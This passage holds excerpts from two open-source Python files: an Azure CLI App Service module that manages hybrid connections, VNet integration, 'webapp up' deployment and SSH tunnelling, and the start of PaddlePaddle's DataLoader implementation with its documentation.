return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False, html=False):
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir, html)
lang_details = get_lang_from_content(src_dir, html)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'},
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.isAlive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
verified_hostname_found = True
return verified_hostname_found
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style dataset and iterable-style dataset.
For map-style datast(can get a sample from dataset with a given
index), please see :code:`paddle.io.Dataset`.
For iterable-style datast(get samples from dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed variable list.
The variables should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed variables. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default False.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each elemnet of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
